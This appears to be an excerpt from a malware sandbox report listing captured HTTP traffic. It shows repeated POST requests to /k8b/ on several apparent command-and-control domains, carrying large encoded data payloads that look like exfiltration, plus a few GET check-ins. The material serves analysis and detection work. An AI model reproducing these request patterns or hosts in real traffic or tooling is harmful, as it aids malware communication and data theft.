6d 4d 44 54 78 4e 56 49 44 5a 78 6d 38 78 61 6b 56 67 61 70 4a 59 50 66 75 44 49 67 75 71 35 28 59 57 49 45 78 57 52 44 51 6b 6c 39 74 54 73 6e 6b 65 63 35 56 58 59 71 48 6f 68 4a 30 74 33 63 4e 7e 48 53 66 30 39 49 4f 73 47 62 5f 7a 79 58 32 66 57 6e 55 49 45 6b 5a 6e 46 78 72 42 6a 43 34 64 4e 41 54 4d 31 7a 41 44 44 74 33 49 37 6c 50 6d 52 45 66 45 42 63 58 38 37 66 4a 49 48 6d 44 33 71 6b 51 6d 35 49 6d 46 6e 5a 58 78 59 67 4f 4a 4b 6f 71 47 69 63 32 75 63 4a 5f 6a 6c 53 50 38 69 50 5a 33 4d 36 31 71 43 5a 42 32 46 74 35 64 46 4d 5a 6a 67 7a 4a 31 67 4a 47 46 45 77 68 39 6d 38 53 36 30 49 6d 7a 58 6c 53 61 68 59 44 37 6a 68 5a 36 51 72 75 5a 4a 4c 53 35 44 41 49 6e 74 42 30 62 59 38 59 64 50 58 4e 70 33 4a 41 4d 56 53 4d 64 6f 31 38 
6a 46 69 78 4e 35 69 4a 30 4c 37 52 53 36 47 39 61 6f 72 71 4d 66 69 63 70 4f 50 48 6c 75 39 50 50 51 35 67 49 6d 77 4d 79 68 54 4d 58 55 5a 71 38 4e 59 42 68 4e 73 62 32 77 70 68 73 44 38 54 72 39 7e 72 4c 2d 6f 4e 7a 65 4c 62 6a 6e 5a 2d 36 6b 7a 35 64 4d 58 65 66 73 36 33 4a 7a 38 57 6b 48 68 68 48 76 57 4b 48 4b 31 7a 6e 54 46 66 39 56 4c 66 31 4c 37 2d 57 45 5a 56 36 64 58 4e 72 79 48 74 6b 4f 50 52 6f 54 57 32 59 62 70 4b 6a 79 74 46 4e 4d 79 53 65 5f 52 77 6b 62 54 5a 71 2d 38 44 4f 6c 70 39 41 4c 74 34 4d 41 28 50 39 7a 52 72 6d 4a 74 34 52 76 7e 6a 46 79 48 4e 58 5f 68 71 77 5a 68 33 61 63 41 57 4c 78 68 42 52 31 66 4d 59 41 6c 38 57 34 70 46 75 57 76 4e 73 4c 28 6c 34 38 4f 76 48 69 4f 56 6e 7a 78 78 35 35 4b 66 56 38 51 57 48 39 7e 71 5a 6e 6c 67 44 33 79 67 5a 4b 31 33 6b 6a 4c 57 35 6c 4d 50 6a 75 79 54 77 6e 45 6f 35 5a 52 39 6c 71 70 64 7e 78 47 72 50 62 50 54 49 6e 44 4b 79 44 75 53 4b 54 43 52 38 70 32 45 63 61 76 33 63 5a 6d 46 46 56 4d 30 51 48 43 59 33 30 71 55 50 5f 4e 6e 4d 32 63 7a 61 4e 31 31 7
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.hblajiche.comConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.hblajiche.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hblajiche.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 58 6f 58 68 39 57 32 38 5a 76 67 64 58 33 44 2d 73 78 72 54 4e 4e 47 5f 54 30 35 4e 72 6d 39 6b 64 37 71 4c 38 68 65 41 55 59 63 4d 7e 4d 30 38 66 57 30 6f 74 51 64 65 67 5a 38 48 46 6f 6e 49 28 6f 68 48 7e 61 47 54 53 58 77 44 56 42 56 62 42 46 59 41 41 46 43 7a 4e 75 58 6e 47 57 52 4c 34 4e 68 58 63 67 48 4c 6c 5a 49 50 75 61 52 4f 38 64 6d 34 4b 43 4a 6b 69 6d 41 31 50 45 75 44 6a 58 30 56 6d 4a 6d 4b 4b 55 53 6d 79 70 34 45 64 32 4f 64 50 70 66 69 57 52 76 6d 42 45 6a 43 72 6a 4c 79 65 32 54 6a 34 34 7e 6c 62 39 4b 41 57 50 75 6d 79 63 50 63 6f 44 58 5f 7e 47 79 79 42 5f 76 52 56 72 68 32 52 34 74 52 41 5a 56 67 68 78 63 67 39 4b 52 56 55 47 5a 65 44 30 79 32 67 78 79 46 7a 70 63 6a 39 6d 64 6a 48 79 54 77 66 37 31 4c 4a 59 7a 66 50 6e 58 52 74 45 48 63 6b 7a 44 35 43 63 65 46 76 50 67 63 61 57 6a 31 4d 32 75 48 68 45 36 36 37 32 6f 68 46 75 61 4b 34 61 28 54 5a 71 43 4d 6f 76 63 68 47 52 4f 63 31 79 55 67 59 2d 67 6d 45 33 61 61 73 6e 4e 65 67 6d 78 35 65 36 6a 75 69 69 74 78 47 4f 55 49 71 78 44 4f 30 4f 67 77 48 6f 78 36 6c 43 67 45 65 39 37 4d 38 42 63 72 62 75 70 41 79 76 66 4e 4b 62 4f 31 57 7a 4b 57 61 68 37 76 55 6b 71 78 45 63 4a 69 38 51 75 65 52 45 37 44 46 52 49 79 58 79 31 71 64 44 6d 53 76 48 4b 6b 4a 50 6d 48 4b 48 67 6e 4a 59 4c 5f 4e 78 72 46 71 66 4f 44 57 54 6c 67 4f 66 67 69 4b 56 7e 50 51 6d 63 32 4f 45 59 4d 62 53 42 6b 52 79 36 56 56 73 45 43 61 4e 30 6e 51 31 56 55 38 6a 34 45 6d 63 52 33 6c 76 50 6c 43 4e 31 39 59 79 4e 59 32 35 53 6d 7a 52 4f 6e 72 65 48 43 34 37 42 64 72 36 32 61 67 5f 7a 61 6a 69 45 
67 62 58 36 32 45 75 52 65 78 78 47 50 56 35 66 32 6d 75 45 34 52 6f 61 62 43 4b 28 79 6d 42 32 39 37 59 68 66 30 74 39 7a 41 6b 32 35 64 2d 6e 5f 66 6f 6e 73 39 78 55 31 4b 53 66 4b 4d 63 6b 57 38 54 6c 6f 51 45 4b 66 28 4f 4b 52 61 33 37 45 51 65 49 52 57 55 77 36 78 79 6f 63 4d 34 75 41 6c 48 39 6d 64 73 38 4f 6c 46 6d 73 63 57 6a 73 45 56 5a 57 32 39 6c 69 56 49 6d 74 4e 30 66 6d 77 64 54 43 46 41 64 52 52 33 5a 49 69 4d 51 70 6e 75 56 6f 51 46 38 4e 4e 64 58 4e 42 58 42 30 6f 5a 54 4d 63 76 63 62 62 30 55 64 79 73 31 50 6c 75 5a 30 54 34 68 77 6d 77 29 2e 00 6e 41 33 36 49 34 51 Data Ascii: 2d=XoXh9W28ZvgdX3D-sxrTNNG_T05Nrm9kd7qL8heAUYcM~M08fW0otQdegZ8HFonI(ohH~aGTSXwDVBVbBFYAAFCzNuXnGWRL4NhXcgHLlZIPuaRO8dm4KCJkimA1PEuDjX0VmJmKKUSmyp4Ed2OdPpfiWRvmBEjCrjLye2Tj44~lb9KAWPumycPcoDX_~GyyB_vRVrh2R4tRAZVghxcg9KRVUGZeD0y2gxyFzpcj9mdjHyTwf71LJYzfPnXRtEHckzD5CceFvPgcaWj1M2uHhE6672ohFuaK4a(TZqCMovchGROc1yUgY-gmE3aasnNegmx5e6juiitxGOUIqxDO0OgwHox6lCgEe97M8BcrbupAyvfNKbO1WzKWah7vUkqxEcJi8QueRE7DFRIyXy1qdDmSvHKkJPmHKHgnJYL_N
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.hblajiche.comConnection: closeContent-Length: 169128Cache-Control: no-cacheOrigin: http://www.hblajiche.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hblajiche.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 58 6f 58 68 39 55 58 61 56 5f 30 4d 51 46 33 5f 74 68 36 51 4a 4e 33 6d 58 32 73 4a 37 45 74 33 55 4c 47 68 38 68 75 45 42 4d 5a 54 35 74 6b 38 5a 56 64 68 67 51 64 5a 69 5a 38 45 49 49 72 77 32 66 64 31 7e 59 71 35 53 58 6f 4d 50 77 46 65 42 31 5a 41 41 6c 66 41 63 64 71 37 47 55 56 2d 34 70 46 50 5a 67 62 4c 34 39 63 33 69 65 4e 38 37 63 61 72 57 43 46 68 78 7a 30 57 50 58 33 30 6a 31 4a 77 68 4e 7e 49 4e 68 53 74 39 4b 67 73 61 6b 75 53 51 74 33 6c 4b 43 54 31 4c 44 7a 4f 6c 47 6e 4d 52 58 54 67 78 73 71 72 4f 4e 37 7a 47 4f 36 78 30 4d 66 49 6f 45 72 76 7a 51 7a 30 54 4a 32 63 54 61 74 63 65 70 35 54 59 4f 42 34 6c 33 49 64 37 4a 35 36 49 79 55 41 47 6b 50 69 6a 7a 62 43 7e 73 49 78 37 58 52 5a 66 7a 69 46 66 73 4e 51 4c 59 69 46 43 41 72 64 6c 30 6e 45 6a 78 76 66 66 73 65 2d 38 50 67 51 4f 46 72 6a 41 53 57 4f 69 58 7a 73 69 68 31 6c 50 64 50 66 28 5a 61 2d 57 6f 69 33 71 65 4d 54 4d 42 65 6b 6e 53 67 76 59 74 38 43 44 33 62 49 6d 46 30 7a 67 6d 78 54 65 34 4b 44 6b 54 35 78 41 4d 64 43 6d 79 37 43 32 4f 67 78 42 38 64 34 76 51 30 55 65 39 6a 4d 39 31 56 45 64 64 4a 41 32 39 48 4f 4b 36 4f 31 44 44 4b 57 58 42 37 73 44 30 71 38 45 61 4e 32 39 56 7e 65 55 32 37 42 46 77 49 43 57 47 31 4e 4e 44 6d 66 36 56 69 75 4e 50 43 5f 4b 48 45 6a 4b 35 54 42 4d 69 62 45 75 39 57 66 55 68 39 6a 43 50 6c 6c 4b 57 66 53 51 6d 67 5a 4a 47 70 68 66 32 42 70 53 77 6d 4b 44 38 6f 64 66 73 30 34 41 41 70 46 73 79 77 75 6b 73 55 64 6b 50 66 69 43 73 70 68 57 51 45 44 7e 59 32 32 31 67 61 52 78 66 32 67 39 36 35 78 67 72 4b 43 6d 66 6a 34 6d 44 
73 45 61 6c 57 73 57 5f 51 37 37 54 71 63 42 5a 69 45 68 73 51 68 4e 63 6a 58 48 37 76 68 6b 52 32 70 6a 4f 74 31 78 37 31 65 4c 58 44 6e 52 63 48 51 4b 75 28 55 38 55 34 32 62 43 69 59 48 4d 38 44 39 53 78 4e 44 52 79 67 78 5f 50 43 51 6b 43 35 51 36 68 76 55 56 46 4e 37 7a 63 47 49 62 76 2d 68 56 4e 48 45 71 6f 57 71 69 32 58 57 6a 33 6e 46 33 73 6e 28 35 6f 5f 66 35 4f 64 4f 53 58 56 30 39 58 5a 50 46 70 5a 61 30 55 70 73 66 34 61 68 2d 4a 50 52 45 34 4d 44 63 6e 51 46 30 77 71 28 38 7e 76 62 76 4a 79 54 57 6b 76 7e 64 59 7a 7a 34 34 73 59 4a 45 53 32 31 35 55 4d 59 73 36 77 6f 30 58 67 71 69 75 47 5f 6f 61 31 67 72 6d 67 67 57 47 58 43 4c 62 72 71 38 54 57 68 7e 53 61 50 51 66 6f 49 39 56 70 55 55 72 4f 77 52 6d 45 6d 42 62 52 58 33 6f 68 33 77 5f 6d 39 67 53 73 36 37 7a 70 33 45 31 55 49 68 54 55 70 78 39 55 72 62 70 59 6d 35 46 76 33 73 41 6a 70 4f 6a 4f 5f 54 56 4e 4b 68 64 6d 55 35 49 76 75 42 44 34 6a 67 45 55 32 44 51 75 32 7e 79 37 58 35 62 62 68 5a 4d 6f 39 68 76 43 66 55 32 70 71 62 55 30 6f 76 58 47 50 7
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.synertry.netConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.synertry.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.synertry.net/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 61 75 6f 71 72 36 6b 53 4b 78 4f 6f 68 77 77 4c 6a 67 56 77 73 4d 4a 39 78 77 79 47 38 31 6e 39 49 75 77 72 4f 6a 69 37 34 45 6b 69 79 67 4e 36 71 6e 55 49 6a 44 56 6f 38 73 5a 2d 63 6a 6b 6a 75 50 78 47 47 7a 48 63 41 32 70 4d 59 77 35 62 52 37 6c 4b 45 59 31 5f 46 5f 62 35 55 37 77 33 52 33 65 79 7e 71 6e 51 45 63 6e 33 57 4f 37 77 64 4a 37 4d 6a 45 52 7a 37 4e 78 2d 73 68 6c 4c 43 37 71 78 47 43 74 77 56 7a 5a 76 54 6d 59 67 67 6a 28 30 38 44 35 31 57 39 4e 45 38 2d 31 43 67 35 6a 67 69 35 39 4c 67 69 61 6a 61 68 56 48 6b 35 67 70 53 51 68 64 6a 49 6e 59 6d 46 61 57 57 4f 4f 49 75 2d 5a 7a 55 34 28 38 4a 66 45 6c 28 4e 66 68 74 55 66 6b 77 51 6d 64 46 2d 74 73 6a 4c 4b 77 71 4b 42 36 76 4d 45 56 4c 36 35 37 41 69 28 67 61 6a 70 49 6f 68 47 48 77 52 34 71 6a 34 51 39 53 6c 68 79 69 72 72 41 35 69 77 70 35 61 72 6a 6f 46 4c 56 5a 6b 4a 76 5a 51 55 41 6c 73 73 59 4e 30 33 36 63 47 7a 69 53 5a 7e 6e 64 4f 63 2d 51 37 68 57 5a 61 63 6f 49 6a 53 54 47 45 54 51 4f 42 47 51 65 49 6d 41 5a 6e 58 2d 4d 39 37 63 33 4a 56 43 35 6c 76 2d 77 52 41 46 73 33 76 44 31 75 55 48 6a 34 4b 49 6a 66 6a 52 61 62 79 54 4f 66 6b 43 65 56 64 30 72 70 4b 79 64 72 58 4f 48 42 4d 38 31 5f 6f 62 4c 46 35 59 58 32 68 78 76 4d 59 72 37 69 41 4c 4a 6d 4f 33 6b 48 74 74 6c 6e 6a 35 4d 38 5a 6e 73 65 4d 67 4e 34 63 73 74 56 54 45 70 32 30 41 71 69 6f 31 78 71 30 78 34 33 77 79 57 77 71 30 62 78 32 57 42 7a 7a 44 41 75 72 71 44 67 36 56 68 73 6d 51 79 59 6d 36 63 77 6e 71 66 54 6c 75 62 66 53 37 62 68 51 6a 41 51 74 68 51 44 69 57 74 4e 67 78 4d 68 75 6d 38 48 71 4e 
64 70 4d 44 6d 35 41 46 50 6a 35 32 42 39 30 4a 79 53 41 68 5a 68 7a 42 48 77 76 38 62 64 33 77 63 5f 42 47 6f 72 56 72 4e 77 77 6d 6a 6a 79 58 39 2d 4f 66 45 72 49 58 33 72 28 72 4d 76 69 53 75 57 4f 49 41 34 69 6c 63 5f 55 35 77 4d 49 43 50 70 36 30 59 42 79 72 41 65 76 4c 6f 4e 58 56 37 55 55 68 5a 38 47 68 66 55 4b 52 56 46 71 72 56 65 4a 30 4b 6e 42 78 59 59 6e 47 48 67 6f 33 63 41 76 55 74 4a 77 58 6b 4d 78 6a 49 59 57 38 73 36 75 48 45 30 41 6e 44 59 45 77 55 44 63 4e 56 48 78 32 4c 5f 79 52 4a 37 67 32 56 43 32 55 63 32 79 32 4a 49 57 59 51 51 29 2e 00 29 2e 00 6e 41 33 36 Data Ascii: 2d=auoqr6kSKxOohwwLjgVwsMJ9xwyG81n9IuwrOji74EkiygN6qnUIjDVo8sZ-cjkjuPxGGzHcA2pMYw5bR7lKEY1_F_b5U7w3R3ey~qnQEcn3WO7wdJ7MjERz7Nx-shlLC7qxGCtwVzZvTmYggj(08D51W9NE8-1Cg5jgi59LgiajahVHk5gpSQhdjInYmFaWWOOIu-ZzU4(8JfEl(NfhtUfkwQmdF-tsjLKwqKB6vMEVL657Ai(gajpIohGHwR4qj4Q9SlhyirrA5iwp5arjoFLVZkJvZQUAlssYN036cGziSZ~ndOc-Q7hWZacoIjSTGETQOBGQeImAZnX-M97c3JVC5lv-wRAFs3vD1uUHj4KIjfjRabyTOfkCeVd0rpKydrXOHBM81_obLF5YX2hxvMYr7iALJmO3kHttlnj5M8Zn
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.synertry.netConnection: closeContent-Length: 169128Cache-Control: no-cacheOrigin: http://www.synertry.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.synertry.net/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 61 75 6f 71 72 37 74 72 4e 42 37 77 77 31 59 4b 68 77 46 43 6f 49 4e 76 67 67 66 62 72 7a 4f 4f 55 4e 46 67 4f 6a 79 5f 30 68 42 5f 31 41 64 36 69 46 4d 50 35 7a 56 6e 72 38 5a 78 59 6a 70 4b 75 66 4a 4f 47 79 7a 79 41 32 68 4c 53 54 77 66 53 72 6c 64 47 34 4a 50 56 50 4f 37 55 2d 70 4f 51 56 53 36 37 71 37 51 42 6f 4c 78 4b 66 71 79 59 4d 53 4d 35 55 64 32 32 76 42 6e 73 52 4a 5f 44 65 36 54 4c 54 78 32 58 78 46 77 4e 33 70 33 6b 79 33 72 79 7a 74 32 54 36 64 58 34 5a 64 47 68 34 6a 6f 74 59 39 49 6f 7a 79 71 66 6d 78 50 75 6f 31 54 42 7a 70 76 6a 4c 57 76 6f 54 36 44 63 74 4b 41 6a 76 55 57 66 70 37 69 46 4d 38 48 37 4c 6a 71 76 56 75 32 28 79 75 57 50 50 41 73 69 49 79 65 6b 4f 46 42 38 70 6f 5a 54 59 78 70 42 54 33 6f 53 41 67 71 67 47 37 42 6e 52 59 79 69 36 39 53 4d 31 67 6d 74 4c 72 45 74 30 63 56 7e 59 61 75 6f 57 6a 30 54 48 70 36 52 6b 68 48 32 61 6c 39 41 78 4b 43 61 6b 4c 55 64 4e 43 50 5a 5f 6f 6c 58 6f 52 32 65 61 64 6f 47 42 36 6d 47 45 54 71 4f 44 7e 36 65 35 43 41 59 79 62 58 4e 65 54 75 69 5a 56 6c 28 31 28 38 6d 79 6b 76 73 33 33 44 31 62 70 61 6b 66 57 49 6b 4f 54 57 61 35 61 54 44 50 6b 43 53 31 64 31 76 70 4b 4a 64 70 28 77 57 78 67 38 6c 64 6f 5a 4a 6d 68 53 61 55 39 38 28 4d 59 73 68 57 30 56 43 46 62 51 6b 47 70 70 6b 47 4b 4f 50 4e 52 6b 6f 39 6b 73 4c 4b 30 76 69 48 50 59 70 77 73 59 71 69 6b 4b 77 72 64 6d 7a 31 45 76 45 6d 69 31 61 67 4b 46 52 41 61 62 51 4c 57 77 52 7a 4b 52 38 4d 79 57 78 34 33 6f 63 54 44 49 65 56 78 36 54 5f 32 42 64 51 45 76 48 68 39 79 4d 77 32 36 6e 66 30 70 4c 78 7e 45 37 6c 36 
70 4d 72 67 4e 6e 36 6f 6c 5a 51 56 68 47 75 67 30 34 77 55 34 57 41 66 4b 41 43 58 4a 61 4e 33 6b 57 61 4e 6f 6e 70 42 77 59 7a 46 34 71 47 53 4e 7a 73 69 64 46 4a 77 59 31 63 6a 53 48 5f 37 53 76 54 6d 48 45 36 33 58 66 75 42 59 69 75 77 32 50 4a 33 41 55 51 48 53 4a 66 62 72 6c 4f 36 72 74 6e 6b 41 43 61 43 35 4c 6d 28 33 64 33 79 33 55 38 39 4f 65 32 4a 5a 65 35 66 79 61 79 30 39 62 6e 50 68 33 34 49 6c 6d 74 56 58 48 50 6a 4d 34 61 44 75 48 31 30 6f 47 35 31 71 54 69 56 4e 52 44 73 54 4d 66 28 4a 4d 63 6b 39 66 53 61 4d 65 7a 57 6c 46 49 37 4b 4e 5a 55 6c 47 31 77 72 78 6e 74 53 6c 55 75 45 70 34 77 65 28 34 64 72 49 43 63 74 34 4a 37 70 65 74 36 33 70 74 67 35 43 75 39 6f 53 4a 6b 6d 32 6a 6e 41 44 42 33 6d 42 48 66 49 30 46 67 31 61 38 31 31 6a 4d 32 59 31 70 48 4b 6a 45 51 78 51 46 42 49 6a 4f 55 6d 54 4d 30 38 58 75 57 6a 69 69 4e 63 76 6b 30 75 63 7a 7e 65 4b 66 4a 64 6a 71 35 31 70 70 79 73 6b 70 48 73 46 61 59 6a 39 34 65 43 76 35 6d 64 57 5a 64 2d 4f 53 4b 6e 72 6e 41 51 5a 69 35 42 4e 4b 6f 77 36 56 68 3
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.thegamergang.comConnection: closeContent-Length: 712Cache-Control: no-cacheOrigin: http://www.thegamergang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thegamergang.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 4f 55 53 41 70 55 43 59 43 63 31 69 5a 37 66 72 6e 44 38 75 7a 32 5a 50 66 6e 4a 31 48 6f 7a 62 33 35 6b 6e 62 5f 69 6b 63 56 6f 5a 49 4c 69 45 64 6e 78 35 36 46 6e 31 34 6f 31 42 43 4a 51 6e 79 59 4d 6d 4b 52 51 4f 49 58 34 49 6f 56 75 65 5a 50 30 2d 44 61 6b 54 33 71 46 51 48 65 56 45 4d 68 74 67 49 68 61 49 6c 41 69 42 38 61 51 44 35 62 57 6a 48 53 30 52 61 30 4d 75 45 6b 52 39 48 4b 5a 69 73 69 6a 36 35 53 65 59 47 31 4b 6e 63 36 45 6a 7a 2d 6c 49 5a 74 6f 39 37 52 62 56 48 44 50 46 33 6b 7e 34 6f 54 51 4f 76 53 6b 56 30 6f 68 51 38 57 77 37 4b 79 48 4e 51 4d 4a 4a 58 76 32 79 32 31 65 56 61 79 35 72 6b 7a 77 7a 4c 35 58 2d 34 4b 45 45 69 55 7e 30 49 33 47 78 63 68 4f 58 62 4e 4a 58 71 46 35 32 5a 30 7e 5f 76 38 53 58 71 5f 4e 62 48 54 32 2d 59 59 44 61 37 65 67 4c 69 68 54 4c 30 64 59 61 7a 76 69 6a 70 4d 49 66 6d 6f 4a 7a 51 69 47 65 39 77 49 65 66 47 42 32 34 7a 39 73 61 38 5a 55 61 4a 48 6a 64 61 74 6c 69 77 44 64 51 67 4f 39 67 68 4f 77 4c 79 6f 4d 5a 33 51 51 7a 44 57 33 61 2d 6e 63 47 4f 56 61 74 73 57 70 77 2d 6b 79 56 68 52 4c 66 74 45 4c 36 38 75 31 77 51 35 58 57 39 48 7a 70 49 41 6b 67 68 58 47 4e 59 34 4b 43 65 30 34 73 43 64 4c 79 69 4b 54 45 6b 52 4e 70 7a 70 63 65 34 55 75 4a 43 4a 6d 75 6c 45 34 42 45 4c 55 77 6a 52 44 63 4b 7a 6f 6e 6d 33 47 43 66 45 76 73 73 38 31 77 49 4a 4b 36 72 7e 66 54 69 7e 50 70 59 75 44 42 54 36 4f 6a 61 4a 4f 36 6a 67 53 4a 5f 53 41 6d 69 4a 71 54 55 50 47 57 4b 7a 61 66 68 78 72 4f 54 38 46 51 6d 32 45 4b 69 73 56 7a 4f 74 71 4e 5f 57 55 39 53 4c 2d 66 38 51 33 31 6b 34 77 
46 76 4c 47 76 6f 4f 72 6b 4a 4c 48 37 66 56 4f 54 4b 49 4b 73 56 30 42 59 79 61 4d 71 76 65 57 74 36 4a 35 5a 31 30 46 62 72 66 4d 44 67 69 32 33 48 64 64 4f 63 45 41 32 72 6d 44 7a 61 6b 4e 30 37 6d 6b 4f 4e 46 46 6b 4e 51 6e 51 5f 4f 6b 50 47 28 41 4a 38 46 38 4c 6d 41 4b 79 4d 73 36 51 70 48 67 31 56 43 50 51 30 39 59 72 53 51 79 62 31 6c 49 4d 38 73 68 32 55 37 6c 4c 6d 74 34 57 54 30 70 71 76 33 71 76 5f 77 49 70 5f 49 33 71 74 75 64 71 37 41 49 33 6c 32 42 37 4e 4b 76 66 6f 4c 78 68 79 67 75 4c 6b 58 78 42 4a 58 47 39 76 71 61 28 58 70 5a 71 5a 31 44 6a 77 29 2e 00 79 72 4a 52 61 50 7e Data Ascii: 2d=OUSApUCYCc1iZ7frnD8uz2ZPfnJ1Hozb35knb_ikcVoZILiEdnx56Fn14o1BCJQnyYMmKRQOIX4IoVueZP0-DakT3qFQHeVEMhtgIhaIlAiB8aQD5bWjHS0Ra0MuEkR9HKZisij65SeYG1Knc6Ejz-lIZto97RbVHDPF3k~4oTQOvSkV0ohQ8Ww7KyHNQMJJXv2y21eVay5rkzwzL5X-4KEEiU~0I3GxchOXbNJXqF52Z0~_v8SXq_NbHT2-YYDa7egLihTL0dYazvijpMIfmoJzQiGe9wIefGB24z9sa8ZUaJHjdatliwDdQgO9ghOwLyoMZ3QQzDW3a-ncGOVatsWpw-kyVhRLftEL68u1wQ5XW9HzpIAkghXGNY4KCe04sCdLyiKTEkRNpzpce4UuJCJmulE4BELU
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.thegamergang.comConnection: closeContent-Length: 169128Cache-Control: no-cacheOrigin: http://www.thegamergang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thegamergang.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 32 64 3d 4f 55 53 41 70 56 4c 70 4e 4e 6b 2d 64 49 37 51 6e 54 73 6d 33 32 6f 4b 62 6b 38 78 42 37 53 71 30 72 78 73 62 2d 79 6f 55 30 34 4c 5a 59 36 45 4e 55 4a 30 69 56 6e 79 36 6f 31 43 47 4a 74 59 75 62 38 75 4b 51 55 67 49 58 67 4a 68 7a 71 62 5a 66 31 32 43 36 34 5f 78 71 41 4d 48 63 52 39 4e 48 4d 6c 64 52 57 49 36 6b 32 44 7a 62 67 59 77 2d 7e 34 5a 79 6f 75 57 56 6c 79 44 57 55 45 47 70 6b 48 72 6a 28 34 7a 43 6d 54 4a 57 43 50 50 5a 30 38 32 75 42 50 57 50 56 35 28 77 58 5a 45 43 4f 36 7a 56 7e 37 71 6a 6f 36 71 52 4d 6e 77 61 4d 6d 77 6a 34 46 4b 7a 44 33 4c 70 42 69 63 49 75 4d 33 45 43 7a 52 67 56 31 6d 43 77 72 50 5f 69 4d 31 72 31 67 67 51 75 56 66 32 71 6b 64 6a 33 53 66 73 4e 73 6f 78 4a 79 53 6c 4f 74 6f 72 4c 55 6a 65 39 30 64 67 47 50 53 73 28 73 34 64 4d 68 28 52 54 33 79 74 59 47 37 4b 6d 62 75 4e 4d 55 68 38 4e 65 4a 52 32 50 79 30 34 45 61 45 45 5a 32 32 4a 58 5a 4e 70 6d 51 61 76 31 58 4b 67 70 68 6e 79 67 48 51 50 76 71 48 79 5f 4c 79 6f 6d 5a 79 39 39 79 79 43 33 63 73 7e 51 45 74 4e 47 68 38 58 31 32 75 55 73 62 79 45 51 66 74 4d 4c 38 4e 79 4c 77 6e 74 58 46 65 76 77 74 5a 41 6b 6a 52 58 47 41 34 34 4c 47 65 30 4c 73 41 31 6c 31 67 7e 54 4e 33 52 4c 6f 53 6f 54 64 38 64 53 4b 79 4a 52 37 55 45 59 51 56 58 77 77 67 74 48 64 72 62 53 71 31 58 48 47 36 41 6a 71 61 6f 30 79 35 38 54 36 72 6e 59 54 6a 44 56 71 61 66 7a 58 42 4f 4e 69 66 4a 50 79 69 4d 6e 66 49 50 41 74 51 68 37 46 44 37 4b 5a 61 33 63 66 42 68 4b 4e 77 5a 61 54 6c 7e 75 65 54 4a 71 77 5f 70 75 58 37 54 47 79 79 33 53 52 74 38 56 33 45 49 
4f 45 4f 75 68 70 65 65 78 6c 4f 6d 69 28 64 5a 5a 58 61 59 7a 68 33 77 55 64 79 6d 78 67 2d 4f 6a 74 71 4a 74 54 54 34 72 48 34 47 55 41 44 6e 75 37 6c 74 78 49 65 6f 65 33 4a 65 4d 36 4b 59 77 70 72 4f 74 65 63 51 46 31 59 52 64 51 72 76 44 49 30 6e 6f 49 59 74 33 61 54 6f 32 6e 5f 4e 52 47 35 66 76 28 6b 61 32 66 6d 38 64 7a 6c 41 42 52 44 78 44 50 59 51 54 75 46 44 33 44 6c 68 32 56 77 70 39 75 49 48 78 73 74 77 71 6d 5f 74 51 31 75 47 2d 39 37 73 42 30 67 7e 43 30 4e 62 33 49 62 4b 72 33 57 38 39 48 6d 43 5f 4d 2d 53 79 36 63 69 4b 79 78 59 35 6e 36 49 56 38 38 43 6c 42 33 6c 4e 7a 4b 46 69 50 36 66 66 30 7a 72 4b 6e 50 73 43 32 76 6e 5f 48 39 76 52 43 69 62 57 53 65 34 55 43 51 7e 74 6e 4a 64 53 7a 74 57 6e 54 75 56 44 72 4c 32 59 5a 57 54 71 4e 71 56 2d 6e 71 78 59 32 5a 46 64 62 41 79 6a 4c 65 4f 70 42 30 31 54 6a 4c 57 36 71 71 37 51 41 70 75 56 75 54 6e 67 48 44 4d 36 76 49 50 63 7e 4a 73 43 45 35 67 66 78 37 69 47 61 47 73 51 79 73 74 59 43 52 78 57 63 4e 6e 5f 6b 51 49 56 59 67 74 65 61 69 72 55 4e 4b 68 3
          Source: global trafficHTTP traffic detected: GET /k8b/?2dcDkN=mjsTtdnpzTBT&2d=QU/cSQlyWULsyYPN7f8pVUlciIeVDbN6hq2yW5NFQQssp9aWfv8U6s5pDOfeB2nX0463 HTTP/1.1Host: www.trusted-inspections.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?2d=fKbbjxnSdtwiJkyV4l7JfK3aT1NZ82lbA+70nBCEFJQQwMw6X0Z2v0cp648CNrXDxaoe&2dcDkN=mjsTtdnpzTBT HTTP/1.1Host: www.hblajiche.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
